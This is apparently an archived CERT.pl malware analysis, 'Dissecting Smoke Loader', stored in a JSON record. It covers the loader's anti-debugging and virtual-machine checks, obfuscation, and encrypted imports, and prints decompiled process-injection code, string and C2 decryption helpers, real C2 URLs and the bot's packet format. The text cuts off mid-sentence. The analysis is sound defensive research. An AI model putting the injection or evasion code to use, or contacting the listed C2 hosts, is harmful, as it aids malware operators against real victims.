{
	"id": "5e2d2d5d-0957-487e-9516-b70c0f58ce8c",
	"created_at": "2026-04-06T00:17:58.274277Z",
	"updated_at": "2026-04-10T13:11:42.535611Z",
	"deleted_at": null,
	"sha1_hash": "6d9215c5256d5e222d762c23d056c7ad6f7f89c6",
	"title": "Dissecting Smoke Loader",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2586411,
	"plain_text": "Dissecting Smoke Loader\r\nArchived: 2026-04-05 16:38:02 UTC\r\nSmoke Loader (also known as Dofoil) is a relatively small, modular bot that is mainly used to drop various\r\nmalware families.\r\nEven though it’s designed to drop other malware, it has some pretty hefty malware-like capabilities on its\r\nown.\r\nDespite being quite old, it’s still going strong, recently being dropped from RigEK and MalSpam campaigns.\r\nIn this article we’ll see how Smoke Loader unpacks itself and interacts with the C2 server.\r\nSmoke Loader first surfaced in June 2011 when it was advertiesed for sale on grabberz.com1 and xaker.name2\r\nby a user called SmokeLdr.\r\nSmoke Loader being sold on grabberz.com\r\nWhat’s interesting is that Smoke Loader is sold only to Russian-language speakers3.\r\nSince all functionalities are clearly described in the mentioned forum posts up to 2016 there is no point in\r\nlisting them all here.\r\nThe sample we’ll be analysing is d32834d4b087ead2e7a2817db67ba8ca.\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 1 of 63\n\nDiagram presenting the unpacking timeline\r\nIf you’re only interested in the final payload you can take a quick glance at the diagram above and skip to the\r\nfinal layer.\r\nTable of contents\r\nLayer I\r\nLayer II\r\nDebugger checks:\r\nLots of garbage code\r\nRC4-encrypted imports:\r\nUnpacking\r\nLayer III\r\nJump chains\r\nDefeating\r\nAttempt I\r\nAttempt II\r\nDebugging checks\r\nVirtualization checks\r\nFunction body encryption\r\nAssembly tricks\r\nAssembly Trick I\r\nAssembly Trick II\r\nAssembly Trick III\r\nCustom imports\r\nUnpacking\r\nLayer IV (final)\r\nString encryption\r\nC2 URLs\r\nPacket structure\r\nProgram routine\r\nGeneral IOCs\r\nCollected IOCs\r\nReferences\r\nLayer I\r\nThe first thing Smoke Loader hits us with is a simple PECompact2 or UPX compression.\r\nd32834d4b087ead2e7a2817db67ba8ca: PE32 executable (GUI) Intel 80386, for MS Windows,\r\nPECompact2 compressed\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 2 of 63\n\n8a42240be26a0f3bf16e3d8d894ca73d: PE32 executable (GUI) Intel 80386, for MS Windows, UPX\r\ncompressed\r\nAs with many executable compressions, both are pretty easy do decompress using publicly-accessible\r\nsoftware:\r\nPECompact being used to decompress the first layer\r\nmichal@michal-ThinkPad-13-2nd-Gen ~/smoke_art\u003e upx -d 8a42240be26a0f3bf16e3d8d894ca73d\r\nUltimate Packer for eXecutables\r\nCopyright (C) 1996 - 2013\r\nUPX 3.91 Markus Oberhumer, Laszlo Molnar \u0026 John Reiser Sep 30th 2013\r\nFile size Ratio Format Name\r\n-------------------- ------ ----------- -----------\r\n455168 \u003c- 230400 50.62% win32/pe 8a42240be26a0f3bf16e3d8d894ca73d\r\nUnpacked 1 file.\r\nDecompressing UPX-packed sample\r\nThat wasn’t hard, let’s move on.\r\nLayer II\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 3 of 63\n\nEntry function, which handles the debugging check and performs some useless api calls as a disguise\r\nDebugger checks\r\nThe PEB structure is checked against some debugging challenges:\r\nint amIBeingDebugged()\r\n{\r\nstruct _PEB *v0; // esi\r\nunsigned __int8 v2; // [esp+Fh] [ebp-1h]\r\nv2 = 0;\r\nv0 = NtCurrentPeb();\r\nif ( v0-\u003eBeingDebugged || v0-\u003eNtGlobalFlag \u0026 0x70 || *(v0-\u003eProcessHeap + 4) )\r\nv2 = 1;\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 4 of 63\n\nreturn v2;\r\n}\r\nLots of garbage code\r\nAlmost every function is injected with pointless instructions in order to make the disassembly more\r\ncomplicated than it really is.\r\nA part of RC4 function, which contains a lot of useless code\r\nRC4-encrypted imports\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 5 of 63\n\nIn this stage, almost all imports and library names are encrypted with RC4 before being passed to\r\nLoadLibraryA and then to GetProcAddress.\r\nThe encrypted imports are first placed on stack:\r\n*rc4_key = 0xF3F3C80F; //rc4 key used to decrypt all imports\r\n*\u0026rc4_key[4] = 0xD8F6A03C;\r\n*\u0026rc4_key[8] = 0x8DC6BE0F;\r\n*\u0026rc4_key[12] = 0x527B1805;\r\n*\u0026rc4_key[16] = 0xE0BA0FCD;\r\n*\u0026rc4_key[20] = 0xC6BE0F70;\r\n*\u0026rc4_key[24] = 0xD8A30F;\r\n*v727 = 0xD2BF3A5F; //encrypted \"NtUnmapViewOfSection\"\r\n*\u0026v727[4] = 0x42DCD3A3;\r\n*\u0026v727[8] = 0x7D50FDF6;\r\n*\u0026v727[12] = 0xA4E8715D;\r\n*\u0026v727[16] = 0x30968317;\r\nv727[20] = 0;\r\n...\r\nThen they are decrypted using RC4 with the hardcoded key:\r\nrc4(0x1Bu, rc4_key, 9u, v727, 0x14u); // rc4(key_length, key, unused_var, data, data_length)\r\nFinally, the library name is passed to LoadLibrary and the function name to GetProcAddress:\r\nv670 = LoadLibraryA(v995);\r\nNtUnmapViewOfSection = GetProcAddress(v670, v727);\r\nA custom import table is populated this way and used further in execution.\r\nUnpacking\r\nFinally, a new process is created and two calls to WriteProcessMemory are performed:\r\n{\r\n\"category\": \"process\",\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 6 of 63\n\n\"parentcaller\": \"0x0040f773\",\r\n\"return\": \"0x00000001\",\r\n\"timestamp\": \"2018-05-23 15:25:02,142\",\r\n\"caller\": \"0x0041ad77\",\r\n\"thread_id\": \"3848\",\r\n\"repeated\": 0,\r\n\"api\": \"WriteProcessMemory\",\r\n\"status\": true,\r\n\"arguments\": [\r\n{\r\n\"name\": \"Buffer\",\r\n\"value\": \"MZ\\\\x80\\\\x00...\"\r\n},\r\n{\r\n\"name\": \"StackPivoted\",\r\n\"value\": \"no\"\r\n},\r\n{\r\n\"name\": \"ProcessHandle\",\r\n\"value\": \"0x000000b0\"\r\n},\r\n{\r\n\"name\": \"BufferLength\",\r\n\"value\": \"0x00000200\"\r\n},\r\n{\r\n\"name\": \"BaseAddress\",\r\n\"value\": \"0x00400000\"\r\n}\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 7 of 63\n\n],\r\n\"id\": 180\r\n}\r\n{\r\n\"category\": \"process\",\r\n\"parentcaller\": \"0x0040f773\",\r\n\"return\": \"0x00000001\",\r\n\"timestamp\": \"2018-05-23 15:25:02,282\",\r\n\"caller\": \"0x0041adc5\",\r\n\"thread_id\": \"3848\",\r\n\"repeated\": 0,\r\n\"api\": \"WriteProcessMemory\",\r\n\"status\": true,\r\n\"arguments\": [\r\n{\r\n\"name\": \"Buffer\",\r\n\"value\": \"+\\\\x02\\\\xc4 \\\\x90\\\\xa4\u0026l...\"\r\n},\r\n{\r\n\"name\": \"StackPivoted\",\r\n\"value\": \"no\"\r\n},\r\n{\r\n\"name\": \"ProcessHandle\",\r\n\"value\": \"0x000000b0\"\r\n},\r\n{\r\n\"name\": \"BufferLength\",\r\n\"value\": \"0x00008000\"\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 8 of 63\n\n},\r\n{\r\n\"name\": \"BaseAddress\",\r\n\"value\": \"0x00401000\"\r\n}\r\n],\r\n\"id\": 181\r\n}\r\nThe writes are pretty characteristic and can be easily noticed in the Cuckoo report\r\nOne of them writes the MZ header and the other rest of the binary. If we concatenate these two writes we’ll\r\nget the next layer.\r\nLayer III\r\nWe’re welcomed with:\r\nThe exported start address\r\nWell, that’s not good.\r\nWhat we see is a result of several obfuscation methods and tricks, We’ll look at each one and try to understand\r\nhow it works.\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 9 of 63\n\nJump chains\r\nAlmost all early-executed functions adapt a chained jumps obfuscation technique.\r\nInstead of placing the instructions in a normal, linear manner, instructions are mixed within the functions with\r\njump instructions connecting consecutive instructions.\r\nThe control flow is all over the place\r\nIf we were to write a script to follow the program’s flow and graph instructions we’d probably get something\r\nlike this:\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 10 of 63\n\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 11 of 63\n\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 12 of 63\n\nPartially deobufscated start function\r\nOne can almost immediately see that a vast majority of instructions are used only to divert the natural program\r\nflow.\r\nDefeating\r\nAttempt I\r\nWe tried creating an idaapi script that looks through all instruction blocks within a function and tries to concat\r\nblocks that are connected with each other via a 1:1 jump (jump from one possible address to one possible\r\nlocation).\r\nThe author had probably thought about that and implemented jmp instructions using consecutive jnz and jz\r\ninstructions. This doesn’t complicate our solution too much though.\r\nimport ida_ua\r\nimport idautils\r\nvisited = []\r\ndef iterate_over_blocks(ea):\r\nif ea in visited:\r\nreturn None\r\nlast_jump = None\r\nthis_node = {\r\n'addr':ea,\r\n'code':'',\r\n'instructions':[],\r\n'children':[]\r\n}\r\nvisited.append(ea)\r\nfor head in Heads(ea, ea+30):\r\ni = DecodeInstruction(head)\r\nif i is not None:\r\nmnem = i.get_canon_mnem()\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 13 of 63\n\nthis_node['code'] += '%s: %s\\n' % (hex(head)[:-1], idc.GetDisasm(head))\r\nprint(idc.GetDisasm(head))\r\nif mnem in ['jmp'] and i.Op1.type != ida_ua.o_reg:\r\njump_addr = i.ops[0].addr\r\nif last_jump is not None and last_jump != jump_addr:\r\nchild = iterate_over_blocks(last_jump)\r\nif child is not None:\r\nthis_node['children'].append(child)\r\nchild = iterate_over_blocks(jump_addr)\r\nif child is not None:\r\nthis_node['children'].append(child)\r\nreturn this_node\r\nelif mnem[0] == 'j' and i.Op1.type != ida_ua.o_reg:\r\njump_addr = i.ops[0].addr\r\nif last_jump is None:\r\nlast_jump = jump_addr\r\nprint(\"Setting\")\r\nelse:\r\nassert last_jump == jump_addr\r\nchild = iterate_over_blocks(jump_addr)\r\nif child is not None:\r\nthis_node['children'].append(child)\r\nreturn this_node\r\nelif last_jump is not None:\r\nchild = iterate_over_blocks(last_jump)\r\nif child is not None:\r\nthis_node['children'].append(child)\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 14 of 63\n\nelif mnem in ['retn', 'jmp']:\r\nthis_node['instructions'].append(i)\r\nreturn this_node\r\nelse:\r\nthis_node['instructions'].append(i)\r\nreturn this_node\r\nstart_ea = ScreenEA()\r\nbuf = iterate_over_blocks(start_ea)\r\nA very naive Python script implementing the mentioned approach\r\nIf we run it on the start function and strip the jumps we get:\r\ncall $+5\r\npop ebx\r\nsub ebx, 2997h\r\npush 30h\r\npop eax\r\nmov eax, fs:[eax]\r\ncmp dword ptr [eax+0A4h], 6\r\njl short locret_402A2F\r\nmov esi, eax\r\nmovzx eax, byte ptr [eax+2]\r\ninc eax\r\nmov ecx, 294Dh\r\nmul ecx\r\nadd eax, ebx\r\npush eax\r\nretn\r\nA lot better! But we can actually do even better by letting IDA do most of the work for us.\r\nAttempt II\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 15 of 63\n\nThe only thing we need to do in order to make IDA recognize these blocks as a valid function is to make sure\r\nthat all of the jumps are marked as a definitive change of flow control.\r\nWhile jmp instructions are marked as such by default, the jz/jnz instructions need to by patched to jmp\r\ninstructions:\r\nNotice the newly-created dotted line that denotes an end of function code\r\nThis trick allows IDA to recognize function bodies and even attempt to decompile them:\r\nstruct _PEB *start()\r\n{\r\nstruct _PEB *result; // eax\r\nresult = NtCurrentPeb();\r\nif ( (signed int)result-\u003eOSMajorVersion \u003e= 6 )\r\nresult = (struct _PEB *)(0x294D * (result-\u003eBeingDebugged + 1) + 0x400000);\r\nreturn result;\r\n}\r\nDecompiled start function after patching all jn/jnz instructions\r\nWhile (as almost always) the decompilation isn’t 100% correct, it gives us a good basic idea what the function\r\ndoes.\r\nThis function, for example, loads the PEB structure and then accessess the OSMajorVersion and\r\nBeingDebugged fields.\r\nDebugging checks\r\nIn this layer, we’ve noticed 2 debugging checks, conveniently located right at the beginning of execution.\r\nWhile they are the same as in the previous stage the approach differs slightly.\r\nWhat is interesting is that the debugging checks values are used in calculating the next functions addresses:\r\nmov eax, fs:[eax]\r\nmov esi, eax\r\nmovzx eax, byte ptr [eax+2] // BeingDebugged\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 16 of 63\n\ninc eax\r\nmov ecx, 294Dh\r\nmul ecx\r\nadd eax, ebx\r\npush eax\r\nretn\r\nReading the BeingDebugged field from PEB\r\nmovzx eax, byte ptr [esi+68h] // NtGlobalFlag\r\ninc eax\r\npush 28EAh\r\npop ecx\r\nmul ecx\r\nadd eax, ebx\r\njmp eax\r\nReading the NtGlobalFlag field from PEB\r\nThe code calculates the next jump address based on the values of BeingDebugged and NtGlobalFlag fields, if\r\neither one is not equal to 0 the execution jumps to a random invalid place in memory, harsh.\r\nNormally patching the binary or changing the values mid-debugging works though.\r\nVirtualization checks\r\nBinary tries to get the module handle of “sbiedll” (a library that is used in sandboxing processes in Sandboxie)\r\nusing GetModuleHandleA, if it succeds and thus Sandboxie is installed on the system, the program exits.\r\nA registry key System\\CurrentControlSet\\Services\\Disk\\Enum is checked and if any of the following values\r\nare found within the string, the program exits.\r\nqemu\r\nvirtio\r\nvmware\r\nvbox\r\nxen\r\nFunction body encryption\r\nA vast majority of functions are encrypted:\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 17 of 63\n\npush ebp\r\nmov ebp, esp\r\nsub esp, 0C8h\r\nmov eax, 23A5h\r\nmov ecx, 87h\r\ncall dexor_buffer //the function encryption method\r\ninc esp\r\nlodsb\r\nlodsb\r\nlodsb\r\nlodsb\r\nimul dword ptr ds:0AC8F0647h\r\nlodsb\r\nand eax, 0A0EC275Ch\r\ndaa\r\nin al, dx\r\nmov al, 27h\r\nin al, dx\r\nmovsb\r\nsub [ebx+28h], ebp\r\nA function that is partially encrypted\r\nAfter deobufscation the encryption function turns out to be pretty simple:\r\nchar __usercall dexor_buffer@\u003cal\u003e(int a1@\u003ceax\u003e, int a2@\u003cecx\u003e)\r\n{\r\nchar *v2; // esi\r\n_BYTE *v3; // edi\r\nchar v4; // al\r\nchar result; // al\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 18 of 63\n\nv2 = (char *)(a1 + 0x400000);\r\nv3 = (_BYTE *)(a1 + 0x400000);\r\ndo\r\n{\r\nv4 = *v2++;\r\nresult = v4 ^ 0xAC;\r\n*v3++ = result;\r\n--a2;\r\n}\r\nwhile ( a2 );\r\nreturn result;\r\n}\r\nDecompiled code decryption method\r\nIt accepts an address and number of bytes in eax and ecx registers respectively and xors all bytes in that range\r\nwith a hardcoded byte.\r\nWhat’s also interesting is that the binary tries to keep as little code unencrypted at a time as possible:\r\nmov ecx, 87h\r\nmov eax, 23A5h\r\ncall dexor_buffer // decrypt a new code section\r\n...\r\n\u003c\u003c part of function body \u003e\u003e\r\n...\r\nmov eax, 23A5h\r\nmov ecx, 87h\r\ncall dexor_buffer // encrypt back the old code section\r\nmov eax, 2459h\r\nmov ecx, 0A2h\r\ncall dexor_buffer // encrypt yet again a new code section\r\n...\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 19 of 63\n\n\u003c\u003c further part of function bpdy \u003e\u003e\r\nExample of keeping the code encrypted\r\nWe’re able to decrypt the chunks using an idaapi patching script:\r\ndef dexor_region(ea, amount):\r\nea = 0x00400000 + ea\r\nfor i in range(amount):\r\nb = idaapi.get_byte(ea + i)\r\nb ^= 0xac\r\nidaapi.patch_byte(ea + i, b)\r\nSimple idaapi script that xors a given region with a byte\r\nAssembly tricks\r\nThis layer employs a few neat position-independent-code assembly tricks.\r\nAssembly Trick I\r\ncall loc_4024A7 puts the next instructions (in this case string “kernel32”) address onto stack\r\nand jumps over the data to the code\r\npop esi puts the string’s address into esi register\r\ncmp byte ptr [esi], 0 the pointer can be now used as a normal rdata string\r\nAssembly Trick II\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 20 of 63\n\nInstead of executing jmp eax, eax is firstly pushed onto stack and then retn is executed.\r\nAssembly Trick III\r\ncall $+5 jumps to the next instruction (as call $+5 instruction lengths is 5) but because it’s a call it also pushes\r\nthe address onto stack.\r\nIn this case this is used to calculate the program’s base address (0x004023AA – 0x23AA)\r\nCustom imports\r\nThis stage uses a custom import table using a djb2 hash lookup.\r\nIt first iterates over 4 hardcoded library names, loads each one using LdrLoadDll and stores the handle.\r\nNext, it iterates over 4 corresponding import hashes arrays and looks for matching values.\r\nWhen a match is found, it grabs the functions address from the library thunk and stores it in an api table that is\r\nstored on the stack.\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 21 of 63\n\nHashes of functions to be imported\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 22 of 63\n\nConstructed api function table\r\nUnpacking\r\nFinally, the program uses RtlDecompressBuffer with COMPRESSION_FORMAT_LZNT1 to decompress the\r\nbuffer and execute the final payload using PROPagate injection4.\r\nint __stdcall inject_code(api_table *a1, _DWORD *buffer, int real_size)\r\n{\r\nint v3; // eax\r\nunsigned __int8 *v4; // esi\r\nsigned int v5; // ecx\r\nint v6; // edx\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 23 of 63\n\nint v7; // eax\r\nvoid *v8; // esp\r\nchar *v9; // esi\r\nint v10; // ecx\r\n_DWORD *v11; // edx\r\nunsigned int v12; // ecx\r\nint v13; // edx\r\nint *v14; // esi\r\nint v15; // edi\r\nunsigned int v16; // ecx\r\n__int16 v17; // ax\r\nint v19; // [esp-4h] [ebp-60h]\r\nchar *v20; // [esp-4h] [ebp-60h]\r\nint v21; // [esp+Ch] [ebp-50h]\r\nint a3a; // [esp+10h] [ebp-4Ch]\r\nint a2a; // [esp+14h] [ebp-48h]\r\nint v24; // [esp+1Ch] [ebp-40h]\r\nint v25; // [esp+20h] [ebp-3Ch]\r\nint v26; // [esp+24h] [ebp-38h]\r\nint v27; // [esp+28h] [ebp-34h]\r\nint a4; // [esp+2Ch] [ebp-30h]\r\nint v29; // [esp+30h] [ebp-2Ch]\r\nint v30; // [esp+34h] [ebp-28h]\r\nint v31; // [esp+38h] [ebp-24h]\r\nchar v32; // [esp+3Ch] [ebp-20h]\r\nint v33; // [esp+54h] [ebp-8h]\r\nint v34; // [esp+58h] [ebp-4h]\r\n(dexor_buffer)(657);\r\nv29 = 0;\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 24 of 63\n\nv3 = (*a1-\u003eGetShellWindow)();\r\nif ( !v3 )\r\nreturn (dexor_buffer)(657);\r\na3a = v3;\r\nv21 = 0;\r\n(*a1-\u003eGetWindowThreadProcessId)(v3, \u0026v21);\r\nif ( !v21 )\r\nreturn (dexor_buffer)(657);\r\nv30 = v21;\r\nv31 = 0;\r\n(*a1-\u003eRtlZeroMemory)(\u0026v32, 24);\r\n*\u0026v32 = 24;\r\nif ( (*a1-\u003eNtOpenProcess)(\u0026a2a, 0x28, \u0026v32, \u0026v30) )//\r\nPROCESS_VM_OPERATION|PROCESS_VM_WRITE\r\nreturn (dexor_buffer)(657);\r\nv34 = 0;\r\nv33 = real_size + 0x10000;\r\nif ( (*a1-\u003eNtCreateSection)(\r\n\u0026v24,\r\n0xF001F, // SECTION_ALL_ACCESS\r\n0,\r\n\u0026v33,\r\n64,\r\n0x8000000,\r\n0) )\r\n{\r\nreturn (dexor_buffer)(657);\r\n}\r\nv26 = 0;\r\nv25 = v33;\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 25 of 63\n\nif ( (*a1-\u003eNtMapViewOfSection)(v24, a2a, \u0026v26, 0, 0, 0, \u0026v25, 1, 0, 64) )\r\nreturn (dexor_buffer)(657);\r\nv27 = 0;\r\nif ( (*a1-\u003eNtMapViewOfSection)(v24, -1, \u0026v27, 0, 0, 0, \u0026v25, 1, 0, 64) )\r\nreturn (dexor_buffer)(657);\r\nif ( __GS__ )\r\n++v29;\r\nv4 = \u0026dword_405689;\r\nv5 = 0x38E4;\r\nv6 = 0x2260;\r\ndo\r\n{\r\nv7 = *v4++;\r\nv6 = v7 + 33 * v6;\r\n--v5;\r\n}\r\nwhile ( v5 );\r\nv8 = alloca(v6 ^ 0x9F63E0F6);\r\nv9 = buffer + *buffer;\r\nv10 = *(v9 + 3);\r\nif ( v29 )\r\nv11 = v9 + 264;\r\nelse\r\nv11 = v9 + 248;\r\ndo\r\n{\r\nv19 = v10;\r\nv12 = v11[4];\r\nif ( v12 )\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 26 of 63\n\nqmemcpy((v27 + v11[3]), buffer + v11[5], v12);\r\nv11 += 10;\r\nv10 = v19 - 1;\r\n}\r\nwhile ( v19 != 1 );\r\nif ( v29 )\r\n{\r\ndexor_dwords(\u0026loc_402695, 0x218u);\r\n(loc_402B8D)(v9, v27);\r\n}\r\nelse\r\n{\r\nv20 = v9;\r\nv13 = *(v9 + 13) - v26;\r\nv14 = (v27 + *(v9 + 40));\r\nwhile ( *v14 )\r\n{\r\nv15 = *v14;\r\nv16 = (v14[1] - 8) \u003e\u003e 1;\r\nv14 += 2;\r\ndo\r\n{\r\nv17 = *v14;\r\nv14 = (v14 + 2);\r\nif ( v17 \u0026 0x3000 )\r\n*(v15 + v27 + (v17 \u0026 0xFFF)) -= v13;\r\n--v16;\r\n}\r\nwhile ( v16 );\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 27 of 63\n\n}\r\nv9 = v20;\r\n}\r\na4 = v26 + *(v9 + 10);\r\n(*a1-\u003eNtUnmapViewOfSection)(-1, v27);\r\nsub_401554(a1, a2a, a3a, a4);\r\n(*a1-\u003eNtClose)(v24);\r\n(*a1-\u003eNtClose)(a2a);\r\nreturn (dexor_buffer)(657);\r\n}\r\nLayer IV (final)\r\nString encryption\r\nAll strings are encrypted using RC4 with a hardcoded key:\r\nchar *__thiscall get_decrypted_string(int index)\r\n{\r\nchar *v1; // esi\r\nchar *v2; // ebx\r\nint v3; // eax\r\nint v4; // edx\r\nunsigned int length; // edi\r\nchar rc4_key[4]; // [esp+Ch] [ebp-4h]\r\nv1 = 0;\r\n*(_DWORD *)rc4_key = 0x32D8D3FE;\r\nv2 = \u0026encrypted_strings;\r\nv3 = 0;\r\nv4 = 0;\r\nwhile ( 1 )\r\n{\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 28 of 63\n\nlength = (unsigned __int8)*v2;\r\nif ( *v2 )\r\n++v3;\r\nif ( v3 == index )\r\nbreak;\r\nv2 += length + 1;\r\nif ( (unsigned int)++v4 \u003e= 735 )\r\nreturn v1;\r\n}\r\nv1 = (char *)allocWrapper((void *)(length + 2));\r\nMEMORY[0x77655800](v1, v2 + 1, length);\r\nrc4(v1, rc4_key, length, 4u);\r\nreturn v1;\r\n}\r\nFunction used to get a decrypted string from a specific index in the encrypted blob\r\nStructure of encrypted strings blob\r\nIn this sample, the buffer decrypts to:\r\n(index, string)\r\n(1, 'http://www.msftncsi.com/ncsi.txt')\r\n(2, 'Software\\\\Microsoft\\\\Internet Explorer')\r\n(3, 'advapi32.dll')\r\n(4, 'Location:')\r\n(5, 'plugin_size')\r\n(6, '\\\\explorer.exe')\r\n(7, 'user32')\r\n(8, 'shell32')\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 29 of 63\n\n(9, 'advapi32')\r\n(10, 'urlmon')\r\n(11, 'ole32')\r\n(12, 'winhttp')\r\n(13, 'ws2_32')\r\n(14, 'dnsapi')\r\n(15, 'svcVersion')\r\n(16, 'Version')\r\n(17, 'S:(ML;;NW;;;LW)D:(A;;0x120083;;;WD)(A;;0x120083;;;AC)')\r\n(18, '%s\\\\%hs')\r\n(19, '%s%s')\r\n(20, 'regsvr32 /s %s')\r\n(21, '%s\\\\%hs.lnk')\r\n(22, '%APPDATA%\\\\Microsoft\\\\Windows')\r\n(23, '%TEMP%')\r\n(24, '%ComSpec%')\r\n(25, '.exe')\r\n(26, '.dll')\r\n(27, '/c start \"\" \"%s\"')\r\n(28, ':Zone.Identifier')\r\n(29, 'POST')\r\n(30, 'Content-Type: application/x-www-form-urlencoded')\r\n(31, 'runas')\r\n(32, 'Host: %s')\r\n(33, 'PT10M')\r\n(34, '1999-11-30T00:00:00')\r\n(35, 'Opera scheduled Autoupdate %u')\r\nDecrypted strings\r\nC2 URLs\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 30 of 63\n\nC2 URLs are stored encrypted in the data section:\r\nPart of data section that contains the encrypted URLs\r\nThe encrypted URL structure can be represented as:\r\nEncrypted C2 URL structure\r\nThe encryption method is a simple xor routine with the byte key being derived from the dword key:\r\nchar *__thiscall decrypt_thing(char *this)\r\n{\r\nchar *v1; // ebp\r\nchar v2; // bl\r\nint v3; // esi\r\nchar *v4; // edi\r\nint v5; // eax\r\nint v6; // ebp\r\nchar *v7; // edx\r\nint v8; // edi\r\nchar v9; // al\r\nsigned __int32 v10; // ecx\r\nsigned int v11; // ebx\r\nchar *v13; // [esp+14h] [ebp-4h]\r\nv1 = this;\r\nv2 = *this;\r\nv3 = (unsigned __int8)*this;\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 31 of 63\n\nv4 = (char *)allocWrapper((void *)(v3 + 1));\r\nv5 = (int)(v1 + 1);\r\nv13 = v4;\r\nif ( !v2 )\r\nreturn v4;\r\nv6 = (int)\u0026v1[v3];\r\nv7 = v4;\r\nv8 = v5 - (_DWORD)v4;\r\ndo\r\n{\r\nv9 = v7[v8];\r\nv10 = _byteswap_ulong(*(_DWORD *)(v6 + 1));\r\nv11 = 4;\r\ndo\r\n{\r\nv9 ^= v10;\r\nv10 \u003e\u003e= 8;\r\n--v11;\r\n}\r\nwhile ( v11 );\r\n*v7++ = ~v9;\r\n--v3;\r\n}\r\nwhile ( v3 );\r\nv4 = v13;\r\nreturn v4;\r\n}\r\nDecompiled function used to decrypt C2 URLs\r\nWhich can be rewritten to Python as:\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 32 of 63\n\ndef smoke_unxor(enc_buf, dword):\r\nkey_dword = struct.pack(\"\u003cI\", dword)\r\nr = reduce(lambda x,y:ord(x)^y, key_dword, 0xff)\r\nreturn ''.join(chr(ord(a) ^ r) for a in enc_buf)\r\n\u003e\u003e\u003e smoke_unxor('372B2B2F2C6570703A272F3A2D2B2B3030332C71323370'.decode('hex'), 0x7D680BBE)\r\n'https://experttools.ml/'\r\n\u003e\u003e\u003e\r\nsmoke_unxor('B1ADADA9AAE3F6F6BCA1A9BCABADADB6B6B5AAF7AAADABBCB8B4F6'.decode('hex'),\r\n0x75A407F0)\r\n'https://experttools.stream/'\r\nOutput example\r\nPacket structure\r\nint __fastcall send_command(char *url, __int16 cmd, int some_flag, int some_flag_1, int\r\nadditional_data, _DWORD *a6)\r\n{\r\nchar *c2_url; // ebp\r\nint v7; // esi\r\nint v8; // eax\r\nchar *packet; // edi\r\nint v10; // esi\r\n__int16 command_id; // [esp+1Ah] [ebp-6h]\r\nint packet_length; // [esp+1Ch] [ebp-4h]\r\ncommand_id = cmd;\r\nc2_url = url;\r\nv7 = 63; // header_size\r\npacket_length = 63;\r\nif ( additional_data )\r\n{\r\nv8 = lstrlenA(additional_data);\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 33 of 63\n\nv7 = v8 + 63;\r\npacket_length = v8 + 63;\r\n}\r\npacket = (char *)allocWrapper((void *)(v7 + 1));\r\n*(_WORD *)packet = 2018;\r\nlstrcatA(packet + 2, bot_id);\r\nlstrcatA(packet + 43, \u0026sample_id);\r\npacket[49] = 'a';\r\npacket[50] = dword_2FE53CF;\r\npacket[51] = dword_2FE53D3;\r\n*((_WORD *)packet + 26) = command_id;\r\n*(_DWORD *)(packet + 54) = some_flag;\r\n*(_DWORD *)(packet + 58) = some_flag_1;\r\nif ( additional_data )\r\nlstrcatA(packet + 62, additional_data);\r\nv10 = connect_and_send((int)c2_url, (int)packet, \u0026packet_length, 1, 1);\r\n*a6 = packet_length;\r\nheap_free(packet);\r\nreturn v10;\r\n}\r\nDecompiled function used to pack and send command packets\r\nWhich can be represented as a C structure:\r\nstruct command_packet {\r\nWORD magic = 2018,\r\nBYTE[40] bot_id,\r\nBYTE[6] botnet_id,\r\nBYTE a = 0x61, //hardcoded\r\nBYTE flag_1 = 0,\r\nBYTE flag_2 = 0,\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 34 of 63\n\nWORD cmd_id,\r\nDWORD arg_1,\r\nDWORD arg_2,\r\nBYTE[n] additional_data\r\n}\r\nA struct representing the structure of command packet\r\nPacket encryption is done using RC4 yet again. It’s worth nothing, however, that different keys are used for\r\nencrypting the outbound packets and decrypting the inbound ones:\r\nA part of decompiled function responsible for encrypting packets before sending them to the C2\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 35 of 63\n\nA part of decompiled function responsible for decrypting packets before parsing them\r\nProgram routine\r\nThe binary starts by 